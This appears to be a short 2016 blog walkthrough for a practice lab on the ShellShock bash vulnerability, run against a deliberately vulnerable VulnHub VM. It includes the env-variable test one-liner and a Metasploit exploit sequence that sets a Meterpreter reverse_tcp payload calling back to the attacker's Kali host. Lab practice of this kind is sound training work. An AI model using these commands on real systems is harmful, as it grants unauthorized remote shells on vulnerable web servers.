Monday, October 17, 2016

ShellShock

Kali IP: 123.123.123.51
Victim IP:  123.123.123.52

Download The ShellShock VM from here:
https://download.vulnhub.com/pentesterlab/cve-2014-6271.iso

Install the VM from the download ISO,
Login
check shellsock by command:




check if the server is vulnerable with ShellShock by:

On the Victim PC
bash --version
env x='() { :;}; echo vulnerable' bash -c 'echo just a test shellshock'

On Kali
Open a Broswer:

http://123.123.123.52/cgi-bin/status

Login as root , Open a Terminal
service postgresql start

 msfconsole

 use exploit/multi/http/apache_mod_cgi_bash_env_exec
set LHOST 123.123.123.51
set RHOST 123.123.123.52
set TARGETURI /cgi-bin/status
set payload linux/x86/meterpreter/reverse_tcp

 exploit
Get in Success...!
Posted by at
Labels:

No comments:

Post a Comment